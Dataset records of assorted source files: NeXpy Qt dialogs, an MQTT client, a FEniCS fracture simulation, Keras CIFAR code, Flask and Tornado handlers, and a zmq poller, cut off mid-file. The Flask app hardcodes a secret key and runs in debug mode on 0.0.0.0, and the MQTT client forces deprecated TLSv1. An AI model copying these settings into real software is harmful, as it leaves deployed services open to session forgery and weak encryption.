40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n other_groups = sorted([g for g in _mainwindow.nxclasses \n if g not in standard_groups])\n for name in other_groups:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[name][0], 40),\n QtCore.Qt.ToolTipRole)\n self.combo_box.insertSeparator(self.combo_box.count())\n 
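# 'NXgroup' is appended as a generic fallback after the standard class choices\n            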
self.combo_box.addItem('NXgroup')\n self.combo_box.setCurrentIndex(self.combo_box.findText(self.node.nxclass))\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(combo_label, 1, 0)\n grid.addWidget(self.combo_box, 1, 1)\n else:\n parent_class = self.node.nxgroup.nxclass\n if parent_class != 'NXroot' and parent_class != 'NXtree':\n combo_label = QtGui.QLabel()\n combo_label.setAlignment(QtCore.Qt.AlignLeft)\n combo_label.setText(\"Valid Fields:\")\n self.combo_box = QtGui.QComboBox()\n self.combo_box.currentIndexChanged.connect(self.set_name)\n from .consoleapp import _mainwindow\n fields = sorted(list(set([g for g in \n _mainwindow.nxclasses[parent_class][1]])))\n for name in fields:\n self.combo_box.addItem(name)\n self.combo_box.setItemData(self.combo_box.count()-1, \n wrap(_mainwindow.nxclasses[parent_class][1][name][2], 40),\n QtCore.Qt.ToolTipRole)\n if self.node.nxname in fields:\n self.combo_box.setCurrentIndex(self.combo_box.findText(self.node.nxname))\n else:\n self.name_box.setText(self.node.nxname)\n self.combo_box.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n grid.addWidget(self.combo_box, 0, 2)\n grid.setColumnMinimumWidth(1, 200)\n return grid\n\n def get_name(self):\n return self.name_box.text()\n\n def set_name(self):\n self.name_box.setText(self.combo_box.currentText())\n\n def get_class(self):\n return self.combo_box.currentText()\n\n def accept(self):\n name = self.get_name()\n if name:\n self.node.rename(name)\n if isinstance(self.node, NXgroup):\n if self.combo_box is not None:\n self.node.nxclass = self.get_class()\n super(RenameDialog, self).accept()\n\n \nclass RemoveDialog(BaseDialog):\n \"\"\"Dialog to remove a NeXus node from the tree\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(RemoveDialog, self).__init__(parent)\n \n self.node = node\n \n layout = QtGui.QVBoxLayout()\n layout.addWidget(QtGui.QLabel('Are you sure you want to remove \"%s\"?' \n % node.nxname))\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Remove NeXus File\")\n\n def accept(self):\n del self.node.nxgroup[self.node.nxname]\n super(RemoveDialog, self).accept()\n\n \nclass DeleteDialog(BaseDialog):\n \"\"\"Dialog to delete a NeXus node\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(DeleteDialog, self).__init__(parent)\n \n self.node = node\n \n layout = QtGui.QVBoxLayout()\n layout.addWidget(QtGui.QLabel('Are you sure you want to delete \"%s\"?' 
\n % node.nxname))\n layout.addWidget(self.close_buttons()) \n self.setLayout(layout)\n\n self.setWindowTitle(\"Delete NeXus Data\")\n\n def accept(self):\n del self.node.nxgroup[self.node.nxname]\n super(DeleteDialog, self).accept()\n\n \nclass SignalDialog(BaseDialog):\n \"\"\"Dialog to set the signal of NXdata\"\"\"\n \n def __init__(self, node, parent=None):\n\n super(SignalDialog, self).__init__(parent)\n \n if isinstance(node, NXfield):\n self.group = node.nxgroup\n signal_name = node.nxname\n else:\n self.group = node\n if self.group.nxsignal is not None:\n signal_name = self.group.nxsignal.nxname\n else:\n signal_name = None\n\n self.signal_combo = QtGui.QComboBox() \n for node in self.group.values():\n if isinstance(node, NXfield) and node.shape != ():\n self.signal_combo.addItem(node.nxname)\n if self.signal_combo.count() == 0:\n raise NeXusError(\"No plottable field in group\")\n self.signal_combo.setSizeAdjustPolicy(QtGui.QComboBox.AdjustToContents)\n if signal_name:\n idx = self.signal_combo.findText(signal_name)\n if idx >= 0:\n self.signal_combo.setCurrentIndex(idx)\n else:\n self.signal_combo.setCurrentIndex(0)\n else:\n self.signal_combo.setCurrentIndex(0)\n self.signal_combo.currentIndexChanged.connect(self.choose_signal)\n\n self.grid = QtGui.QGridLayout()\n self.grid.setSpacing(10)\n self.grid.addWidget(QtGui.QLabel('Signal :'), 0, 0)\n self.grid.addWidget(self.signal_combo, 0, 1)\n self.choose_signal()\n\n self.layout = QtGui.QVBoxLayout()\n self.layout.addLayout(self.grid)\n self.layout.addWidget(self.close_buttons())\n self.setLayout(self.layout)\n\n self.setWindowTitle(\"Set signal for %s\" % self.group.nxname)\n\n @property\n def signal(self):\n return self.group[self.signal_combo.currentText()]\n\n @property\n def ndim(self):\n return len(self.signal.shape)\n\n def choose_signal(self):\n row = 1\n self.axis_boxes = {}\n for axis in range(self.ndim):\n self.axis_boxes[axis] = self.axis_box(axis)\n if self.axis_boxes[axis] is not None:\n row += 1\n self.grid.addWidget(QtGui.QLabel(\"Axis %s: \" % axis), row, 0)\n self.grid.addWidget(self.axis_boxes[axis], row, 1)\n while row < self.grid.rowCount() - 1:\n self.remove_axis(row)\n row += 1 \n\n def axis_box(self, axis=0):\n box = QtGui.QComboBox()\n for node in self.group.values():\n if node is not self.signal and self.check_axis(node, axis):\n box.addItem(node.nxname)\n if box.count() == 0:\n return None\n if 'axes' in self.signal.attrs:\n from nexusformat.nexus.tree import _readaxes\n default_axis = _readaxes(self.signal.axes)[axis]\n else:\n axes = self.group.nxaxes\n if axes is not None:\n default_axis = self.group.nxaxes[axis].nxname\n else:\n default_axis = None\n if default_axis:\n try:\n box.setCurrentIndex(box.findText(default_axis))\n except Exception:\n pass\n else:\n box.setCurrentIndex(0)\n return box\n\n def remove_axis(self, axis):\n row = axis + 1\n for column in range(2):\n item = self.grid.itemAtPosition(row, column)\n if item is not None:\n widget = item.widget()\n if widget is not None:\n widget.setVisible(False)\n self.grid.removeWidget(widget)\n widget.deleteLater() \n\n def check_axis(self, node, axis):\n if len(node.shape) > 1:\n return False\n try:\n node_len, axis_len = self.signal.shape[axis], node.shape[0]\n if axis_len == node_len or axis_len == node_len+1:\n return True\n except Exception:\n pass\n return False\n\n def get_axis(self, axis):\n try:\n return self.group[self.axis_boxes[axis].currentText()]\n except Exception:\n return None\n\n def get_axes(self):\n return [self.get_axis(axis) 
for axis in range(self.ndim)]\n\n def accept(self):\n try:\n axes = self.get_axes()\n if None in axes:\n raise NeXusError(\"Unable to set axes\")\n if len(set([axis.nxname for axis in axes])) < len(axes):\n raise NeXusError(\"Cannot have duplicate axes\")\n self.group.nxsignal = self.signal\n self.group.nxaxes = axes\n super(SignalDialog, self).accept()\n except NeXusError as error:\n from .mainwindow import report_error \n report_error(\"Setting signal\", error)\n\n \nclass LogDialog(BaseDialog):\n \"\"\"Dialog to display a NeXpy log filt\"\"\"\n \n def __init__(self, parent=None):\n\n super(LogDialog, self).__init__(parent)\n \n from .consoleapp import _nexpy_dir\n self.log_directory = _nexpy_dir\n\n self.ansi_re = re.compile('\\x1b' + r'\\[([\\dA-Fa-f;]*?)m')\n \n layout = QtGui.QVBoxLayout()\n self.text_box = QtGui.QPlainTextEdit()\n self.text_box.setMinimumWidth(700)\n self.text_box.setMinimumHeight(600)\n layout.addWidget(self.text_box)\n footer_layout = QtGui.QHBoxLayout()\n self.file_combo = QtGui.QComboBox()\n for file_name in self.get_filesindirectory('nexpy', extension='.log*',\n directory=self.log_directory):\n self.file_combo.addItem(file_name)\n self.file_combo.setCurrentIndex(self.file_combo.findText('nexpy.log'))\n self.file_combo.currentIndexChanged.connect(self.show_log)\n close_box = QtGui.QDialogButtonBox(QtGui.QDialogButtonBox.Close)\n close_box.rejected.connect(self.reject)\n footer_layout.addStretch()\n footer_layout.addWidget(self.file_combo)\n footer_layout.addWidget(close_box)\n layout.addLayout(footer_layout)\n self.setLayout(layout)\n\n self.show_log()\n\n @property\n def file_name(self):\n return os.path.join(self.log_directory, self.file_combo.currentText())\n\n def show_log(self):\n f = open(self.file_name, 'r')\n try:\n from ansi2html import Ansi2HTMLConverter\n conv = Ansi2HTMLConverter(dark_bg=False, inline=True)\n text = conv.convert(''.join(f.readlines()))\n self.text_box.appendHtml(text)\n except ImportError:\n self.text_box.setPlainText(self.ansi_re.sub('', f.read()))\n f.close()\n self.text_box.verticalScrollBar().setValue(\n self.text_box.verticalScrollBar().maximum())\n self.setWindowTitle(\"Log File: %s\" % self.file_name)\n\n\n","sub_path":"src/nexpy/gui/datadialogs.py","file_name":"datadialogs.py","file_ext":"py","file_size_in_byte":51732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"162249726","text":"import paho.mqtt.client as mqtt\nimport json\nimport time\nimport ssl\nbroker_host = \"broker.qubitro.com\"\nbroker_port = 8883\ndevice_id = \"PASTE_DEVICE_ID\"\ndevice_token = \"PASTE_DEVICE_TOKEN\"\n\ndef on_connect(client, userdata, flags, rc):\n if rc == 0:\n print(\"Connected to Qubitro!\")\n client.on_disconnect = on_disconnect\n else:\n print(\"Failed to connect, visit: https://docs.qubitro.com/client-guides/connect-device/mqtt\\n return code:\", rc)\n\ndef on_disconnect(client, userdata, rc):\n # E.g. 
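you could call client.reconnect() here to automatically 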
reconnect to the broker\n print(\"Disconnection returned result:\" + str(rc))\n\nclient = mqtt.Client(client_id=device_id)\ncontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1)\nclient.tls_set_context(context)\nclient.username_pw_set(username=device_id, password=device_token)\nclient.connect(broker_host, broker_port, 60)\nclient.on_connect = on_connect\nclient.loop_start()\n\nwhile True:\n if client.is_connected:\n time.sleep(1)","sub_path":"docs/protocol/mqtt/python/qubitro_mqtt_disconnect.py","file_name":"qubitro_mqtt_disconnect.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513634090","text":"import matplotlib.pyplot as plt\n\nfrom fenics import *\nfrom tools.elasticity import *\n\n#----------------------------------------------------------------------#\n# Set some Fenics parameters\nparameters[\"form_compiler\"][\"optimize\"] = True\nparameters[\"form_compiler\"][\"cpp_optimize\"] = True\nparameters[\"form_compiler\"][\"representation\"] = \"uflacs\"\nparameters[\"linear_algebra_backend\"] = \"PETSc\"\nset_log_level(LogLevel.PROGRESS)\ninfo(parameters, False)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Load mesh and define functional spaces\nmesh = Mesh(\"meshes/mesh_fenics.xml\")\nmesh = refine(mesh)\ndim = mesh.topology().dim()\nV = FunctionSpace(mesh, 'Lagrange', 1)\nW = VectorFunctionSpace(mesh, 'Lagrange', 1, dim)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define boundary conditions\nud = Expression(\"t\", t=0.0, degree=1)\n\ndef bottom(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[1]) < tol\n\ndef top(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[1]-1.0) < tol\n\ndef right(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[0]-1.0) < tol\n\ndef left(x, on_boundary):\n tol = 1E-8\n return on_boundary and abs(x[0]) < tol\n\n\nbottomBCs = DirichletBC(W, Constant((0.0, 0.0)), bottom)\ntopBC_y = DirichletBC(W.sub(1), ud, top)\ntopBC_x = DirichletBC(W.sub(0), Constant(0.0), top)\nbcs = [bottomBCs, topBC_x, topBC_y]\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define weak forms\nlmbda, mu = 121.15e3, 80.77e3\ngc, lc = 2.7, 0.0075\n\ndef Max(a, b): return (a+b+abs(a-b))/Constant(2)\n\nd, s = TrialFunction(V), TestFunction(V)\ndu, v = TrialFunction(W), TestFunction(W)\n\nuold, unew, u_ = Function(W), Function(W), Function(W)\ndnew = Function(V)\n\nhistold = energy_density_positive(uold, lmbda, mu)\nhistnew = energy_density_positive(unew, lmbda, mu)\nhist = Max(histold, histnew)\n\nId = ((2.0*hist + gc/lc)*dot(d,s) + gc*lc*inner(nabla_grad(d), nabla_grad(s)) - 2.0*hist*s)*dx\nFu = inner(sigma_spectral_split(u_, dnew, lmbda, mu), epsilon(v))*dx\nJu = derivative(Fu, u_, du)\n\nAd, Ld = lhs(Id), rhs(Id)\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Define variational problems\nd = Function(V)\nprob_dmge = LinearVariationalProblem(Ad, Ld, d)\nprob_disp = NonlinearVariationalProblem(Fu, u_, bcs, Ju)\n\nsolver_dmge = LinearVariationalSolver(prob_dmge)\nsolver_disp = NonlinearVariationalSolver(prob_disp)\n\nprm = 
solver_disp.parameters\nprm[\"newton_solver\"][\"absolute_tolerance\"] = 1E-8\nprm[\"newton_solver\"][\"relative_tolerance\"] = 1E-7\nprm[\"newton_solver\"][\"maximum_iterations\"] = 5\nprm[\"newton_solver\"][\"relaxation_parameter\"] = 1.0\n\"\"\"\nprm[\"linear_solver\"] = \"gmres\"\nprm[\"preconditioner\"] = \"ilu\"\nprm[\"krylov_solver\"][\"absolute_tolerance\"] = 1E-9\nprm[\"krylov_solver\"][\"relative_tolerance\"] = 1E-7\nprm[\"krylov_solver\"][\"maximum_iterations\"] = 1000\nprm[\"krylov_solver\"][\"gmres\"][\"restart\"] = 40\nprm[\"krylov_solver\"][\"preconditioner\"][\"ilu\"][\"fill_level\"] = 0\n\"\"\"\n#----------------------------------------------------------------------#\n\n\n#----------------------------------------------------------------------#\n# Staggered algorithm\nnsteps = 250\ndelta = 1E-5\n\nd.vector().zero()\ndnew.assign(d)\n\nud.t += delta\n\nuold.vector().zero()\nsolver_disp.solve()\nunew.assign(u_)\n\n\nfor n in range(nsteps):\n ud.t += delta\n\n solver_dmge.solve()\n dnew.assign(d)\n\n uold.assign(u_)\n solver_disp.solve()\n unew.assign(u_)\n\n plot(d, cmap='jet')\n plt.draw()\n plt.pause(0.0001)\n#----------------------------------------------------------------------#\n","sub_path":"nonLinearSpectralSplit.py","file_name":"nonLinearSpectralSplit.py","file_ext":"py","file_size_in_byte":3954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"455525669","text":"from typing import List\n\n\nclass Solution:\n def merge(self, nums1: List[int], m: int, nums2: List[int], n: int) -> None:\n \"\"\"\n Do not return anything, modify nums1 in-place instead.\n \"\"\"\n \"\"\"\n https://leetcode.com/problems/merge-sorted-array/\n // Time Complexity : O(m+n)\n 'm' is the number of elements in the first array.\n 'n' is the number of elements in the second array\n // Space Complexity : O(1)\n // Did this code successfully run on Leetcode : Yes\n // Three line explanation of solution in plain english :\n - Two pointers each pointing to the last element in the sorted list\n - Traverse both the lists and copy the larger element\n - If any remaning elements from the second list, copy to the first list.\n \"\"\"\n\n # edge case\n if not nums1 or not nums2 or n == 0:\n return\n\n k, ptr1, ptr2 = m + n - 1, m - 1, n - 1\n while ptr1 >= 0 and ptr2 >= 0:\n # case 1\n # element at ptr1 is greater or equal\n if nums1[ptr1] >= nums2[ptr2]:\n nums1[k] = nums1[ptr1]\n ptr1 -= 1\n # case 2\n # element at ptr2 is greater\n else:\n nums1[k] = nums2[ptr2]\n ptr2 -= 1\n k -= 1\n\n # copy the remaining elements from nums2\n while ptr2 >= 0:\n nums1[k] = nums2[ptr2]\n ptr2 -= 1\n k -= 1\n\n\nif __name__ == '__main__':\n h = Solution()\n nums1 = [1, 2, 3, 0, 0, 0]\n nums2 = [2, 5, 6]\n h.merge(nums1, 3, nums2, 3)\n print(nums1)\n","sub_path":"88_merge_sorted_array.py","file_name":"88_merge_sorted_array.py","file_ext":"py","file_size_in_byte":1708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"275272174","text":"from flask import Flask\nfrom flask import request ,flash\nfrom flask import render_template , redirect , url_for\nimport json\nimport requests\nfrom server import Connection , Action\n\n\napp = Flask(__name__)\napp.debug = True\napp.secret_key = 'secretKey'\napp.config[\"CACHE_TYPE\"] = \"null\"\n\nclass Contacts:\n name = None\n address = None\n email = None\n mobile = None \n\nconnection , res = Connection.open(host = 'localhost' , user = 'root', pwd = '', db = 'db_test' , port 
=3306)\n\n\n@app.route('/', methods=['GET'])\ndef home():\n    if connection:\n        return render_template('index.html' ,result = connection )\n    else:\n        return render_template('index.html' , result = None)\n\n@app.route('/details/contacts' , methods= ['GET'])\ndef details():\n    entries = Action(connection).Show_Details()\n    return render_template('details.html' , entries = entries )\n\n@app.route('/update/contact/<id>' , methods= ['GET'])\ndef update(id):\n    response = Action(connection).Get_Details(id)\n    return render_template('update.html' , id = id , name = response.get('name') , email = response.get('email') , address = response.get('address') ,\n    mobile = response.get('mobile') )\n\n\n@app.route('/contact/submit', methods=['POST'])\ndef submit_contact():\n    Contacts.name = request.form['name']\n    Contacts.email = request.form['email']\n    Contacts.address = request.form['address']\n    Contacts.mobile = request.form['mobile']\n    if Contacts.name:\n        response = Action(connection).Add(Contacts)\n        if response:\n            return redirect(url_for('home' ))\n        else:\n            return redirect(url_for('home' ))\n    else:\n        return redirect(url_for('home' ))\n\n\n@app.route('/update/contact/<id>/individual' , methods= ['PUT' , 'POST' , 'GET'])\ndef update_contact_individual(id):\n    Contacts.name = request.form['name']\n    Contacts.email = request.form['email']\n    Contacts.address = request.form['address']\n    Contacts.mobile = request.form['mobile']\n    if Contacts.name:\n        response = Action(connection).Update(id = id , obj = Contacts)\n        if response.result == 'Success':\n            return redirect(url_for('details'))\n        else:\n            return redirect(url_for('update' ,id = id))\n    else:\n        return redirect(url_for('update' ,id = id))\n\n@app.route('/delete/contact/<id>/individual' , methods= ['DELETE' ,'POST' ,'GET'])\ndef delete_individual_contact(id):\n    response = Action(connection).Delete(id)\n    if response.result == 'Success':\n        return redirect(url_for('details'))\n    else:\n        return redirect(url_for('details'))\n    \nif __name__ == '__main__':\n    app.run(host='0.0.0.0')\n\n    \n    \n","sub_path":"Task/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"319175485","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport numpy as np\nimport ipromps_lib\nfrom sklearn.externals import joblib\nimport os\nimport ConfigParser\nimport matplotlib.pyplot as plt\nimport ipdb\n\n# the current file path\nfile_path = os.path.dirname(__file__)\n\n# read models cfg file\ncp_models = ConfigParser.SafeConfigParser()\ncp_models.read(os.path.join(file_path, '../cfg/models.cfg'))\n# read models params\ndatasets_path = os.path.join(file_path, cp_models.get('datasets', 'path'))\nlen_norm = cp_models.getint('datasets', 'len_norm')\nnum_basis = cp_models.getint('basisFunc', 'num_basisFunc')\nsigma_basis = cp_models.getfloat('basisFunc', 'sigma_basisFunc')\ndatasets_norm_preproc = joblib.load(os.path.join(datasets_path, 'pkl/datasets_norm_preproc.pkl'))\n\nnum_demo = 5\ntest_idx = 0\n\nplt.figure(figsize=(10,5),dpi=80, facecolor='w', edgecolor='b')\n\npromp = ipromps_lib.ProMP()\nfor idx_demo in range(num_demo):\n    promp.add_demonstration(datasets_norm_preproc[0][idx_demo]['left_joints'][:,0])\n\npromp.add_viapoint(0.1, datasets_norm_preproc[0][test_idx]['left_joints'][10,0])\n# promp.add_viapoint(0.2, datasets_norm_preproc[0][test_idx]['left_joints'][20,0])\n# promp.add_viapoint(0.3, datasets_norm_preproc[0][test_idx]['left_joints'][30,0])\n# promp.add_viapoint(0.4, 
datasets_norm_preproc[0][test_idx]['left_joints'][40,0])\n# promp.add_viapoint(0.5, datasets_norm_preproc[0][test_idx]['left_joints'][50,0])\n# promp.add_viapoint(1.0, datasets_norm_preproc[0][test_idx]['left_joints'][100,0])\npromp.param_updata()\n\n\npromp.plot_uViapoints()\npromp.plot_prior(b_regression=False, linewidth_mean=5, b_dataset=False)\npromp.plot_uUpdated(legend='Inferred trajectory')\nplt.plot(promp.x, datasets_norm_preproc[0][test_idx]['left_joints'][:,0], color='g', linewidth=5, label='ground truth')\n\nfor demo_idx in range(num_demo):\n data = datasets_norm_preproc[0][demo_idx]['left_joints'][:,0]\n plt.plot(np.array(range(len(data)))/100.0, data, color='grey', linewidth=2)\n\nplt.rc('legend', fontsize=20, handlelength=5)\n\nax = plt.gca()\nax.spines['top'].set_visible(False) #去掉上边框\nax.spines['right'].set_visible(False) #去掉右边框\nplt.yticks(fontsize=20)\nplt.xticks(fontsize=20)\nplt.title(\"example\",fontsize=20) \nplt.xlabel('t(s)',fontsize=20)\nplt.ylabel('y(m)',fontsize=20)\nplt.legend(loc=2)\n\nplt.show()\n\n","sub_path":"visulization/v_promp.py","file_name":"v_promp.py","file_ext":"py","file_size_in_byte":2306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"361830996","text":"from __future__ import print_function\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.models import Sequential\nfrom keras.models import Model\nfrom keras.layers import Dense, Dropout, Activation, Flatten\nfrom keras.layers import Convolution2D, MaxPooling2D, merge, Input, Lambda\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.optimizers import Adam\nfrom utils.preprocess import get_cifar\n\nbatch_size = 32\nnb_classes = 10\nnb_epoch = 200\ndata_augmentation = True\n\n# show the summary?\nshow_summary = True\n\n# save the weights after training?\nsave_weights = True\nweights_file = 'cifar10_4l.h5'\n\n# the data, shuffled and split between train and test sets\n(X_train, Y_train), (X_test, Y_test) = get_cifar(p=1.0, append_test=False, use_c10=True)\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_test.shape[0], 'test samples')\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\n\n#cross-connections between two conv layers, Y is the middle layer, while U and V are side layers.\n\ninputYUV = Input(shape=(3, 32, 32))\ninputNorm = BatchNormalization(axis=1)(inputYUV)\n\n# To simplify the data augmentation, I delay slicing until this point.\n# Not sure if there is a better way to handle it. 
---Petar\ninputY = Lambda(lambda x: x[:,0:1,:,:], output_shape=(1, 32, 32))(inputNorm)\ninputU = Lambda(lambda x: x[:,1:2,:,:], output_shape=(1, 32, 32))(inputNorm)\ninputV = Lambda(lambda x: x[:,2:3,:,:], output_shape=(1, 32, 32))(inputNorm)\n\nconvY = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(inputY)\nconvU = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(inputU)\nconvV = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(inputV)\n\nconvY = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convY)\nconvU = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(convU)\nconvV = Convolution2D(16, 3, 3, border_mode='same', activation='relu')(convV)\n\npoolY = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convY)\npoolU = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convU)\npoolV = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convV)\n\npoolY = Dropout(0.25)(poolY)\npoolU = Dropout(0.25)(poolU)\npoolV = Dropout(0.25)(poolV)\n\nU_to_Y = Convolution2D(16, 1, 1, border_mode='same', activation='relu')(poolU)\nV_to_Y = Convolution2D(16, 1, 1, border_mode='same', activation='relu')(poolV)\nY_to_UV = Convolution2D(32, 1, 1, border_mode='same', activation='relu')(poolY)\n\nYmap = merge([poolY,U_to_Y,V_to_Y], mode='concat', concat_axis=1)\nUmap = merge([poolU,Y_to_UV], mode='concat', concat_axis=1)\nVmap = merge([poolV,Y_to_UV], mode='concat', concat_axis=1)\n\n\n\nconvY = Convolution2D(64, 3, 3, border_mode='same', activation='relu')(Ymap)\nconvU = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(Umap)\nconvV = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(Vmap)\n\n\nconvY = Convolution2D(64, 3, 3, border_mode='same', activation='relu')(convY)\nconvU = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convU)\nconvV = Convolution2D(32, 3, 3, border_mode='same', activation='relu')(convV)\n\npoolY = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convY)\npoolU = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convU)\npoolV = MaxPooling2D((2,2), strides=(2, 2), border_mode='same')(convV)\n\npoolY = Dropout(0.25)(poolY)\npoolU = Dropout(0.25)(poolU)\npoolV = Dropout(0.25)(poolV)\n\n\nconcatenate_map=merge([poolY,poolU,poolV], mode='concat', concat_axis=1)\n\nreshape=Flatten()(concatenate_map)\nfc=Dense(512, activation='relu')(reshape)\nfc=Dropout(0.5)(fc)\nout=Dense(nb_classes, activation='softmax')(fc)\n\nmodel = Model(input=inputYUV, output=out)\n\nmodel.compile(loss='categorical_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nif show_summary:\n print(model.summary())\n\nif not data_augmentation:\n print('Not using data augmentation.')\n model.fit(X_train, Y_train,\n batch_size=batch_size,\n nb_epoch=nb_epoch,\n validation_data=(X_test, Y_test),\n shuffle=True,\n verbose=2)\nelse:\n print('Using real-time data augmentation.')\n\n # this will do preprocessing and realtime data augmentation\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=0, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.1, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.1, # randomly shift 
images vertically (fraction of total height)\n        horizontal_flip=True, # randomly flip images\n        vertical_flip=False) # randomly flip images\n\n    # compute quantities required for featurewise normalization\n    # (std, mean, and principal components if ZCA whitening is applied)\n    datagen.fit(X_train)\n\n    # fit the model on the batches generated by datagen.flow()\n    model.fit_generator(datagen.flow(X_train, Y_train,\n                        batch_size=batch_size),\n                        samples_per_epoch=X_train.shape[0],\n                        nb_epoch=nb_epoch,\n                        validation_data=(X_test, Y_test),\n                        verbose=2)\n\nif save_weights:\n    model.save_weights(weights_file)\n","sub_path":"models/cifar10_4l.py","file_name":"cifar10_4l.py","file_ext":"py","file_size_in_byte":5650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"527774304","text":"# coding: utf-8\n\ndef main():\n\tISBN = getISBN()\n\tif len(ISBN) == 10:\n\n\t\tsum = getNum(ISBN)\n\n\t\tif verify(sum) == True:\n\t\t\tprint (\"The number is valid\")\n\t\telse:\n\t\t\tprint (\"The number is not valid\") \n\telse:\n\t\tprint (\"The number is not valid\")\ndef getISBN():\n\tISBN = getISBN_input = input(\"Enter an ISBN : \")\n\tISBN = ISBN.replace('-','')\n\t# keep a trailing X/x as-is: it is the ISBN-10 check digit worth 10,\n\t# so replacing it with '10' would break the length check above\n\treturn ISBN\ndef getNum(ISBN):\n\tsum = 0\n\t\n\tfor i in range(10):\n\t\t# treat the check digit 'X' as the value 10\n\t\tdigit = 10 if ISBN[i] in 'Xx' else int(ISBN[i])\n\t\tsum = sum + digit*(10-i)\n\treturn sum\ndef verify(sum):\n\tif sum % 11 == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\nmain()\n\n \n#0-13-030657-6\n","sub_path":"python-learning/2017.3.5/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"4242491","text":"import tornado.web\nfrom json_handler import BaseHandler\n\nclass MenuTemplateHandler(tornado.web.RequestHandler):\n\tdef get(self, url):\n\n\t\tif (url == 'menulevel1'):\n\t\t\tself.render(\"menu/menulevel1.html\")\n\t\telse:\n\t\t\tself.render(\"menu/menulevel2.html\")\n \nclass AboutPageHandler(BaseHandler):\n    def get(self, url):\n        if (url == 'about'):\n            self.render(\"about.html\", name=self.get_current_user() if self.get_current_user() != 'public' else None)\n        elif (url == 'login'):\n            self.render(\"login.html\")\n","sub_path":"handlers/menu_handlers.py","file_name":"menu_handlers.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"457538302","text":"import sys\nimport traceback\nfrom zmq.eventloop import ioloop\nioloop.install()\n\n\ndef get_ioloop():\n    from zmq.eventloop.ioloop import ZMQPoller\n    from zmq.eventloop.ioloop import ZMQError, ETERM\n    from tornado.ioloop import PollIOLoop\n\n    class DebugPoller(ZMQPoller):\n        def __init__(self):\n            super(DebugPoller, self).__init__()\n            self._fds = []\n\n        def register(self, fd, events):\n            if fd not in self._fds:\n                self._fds.append(fd)\n            return self._poller.register(fd, self._map_events(events))\n\n        def modify(self, fd, events):\n            if fd not in self._fds:\n                self._fds.append(fd)\n            return self._poller.modify(fd, self._map_events(events))\n\n        def unregister(self, fd):\n            if fd in self._fds:\n                self._fds.remove(fd)\n            return self._poller.unregister(fd)\n\n        def poll(self, timeout):\n            \"\"\"\n            #737 - For some reason the poller issues events with\n            nonexistent FDs, usually with big ints. We have not yet found the\n            reason for this behavior, which happens only during the tests. 
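The spurious descriptors never correspond to anything registered with this poller. 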
